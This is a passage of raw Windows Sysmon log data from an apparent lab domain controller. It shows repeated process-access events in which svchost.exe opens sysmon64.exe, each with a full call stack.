13:09:46.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001913Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001912Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001911Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001910Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001909Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001908Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001907Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001906Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001905Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001904Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001903Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001902Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.384{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001901Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001900Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001899Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001898Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001897Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001896Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001895Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001894Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001893Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001892Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001891Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000001890Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:09:46.368{08A6967A-4287-6000-0C00-000000009A01}5881088C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dl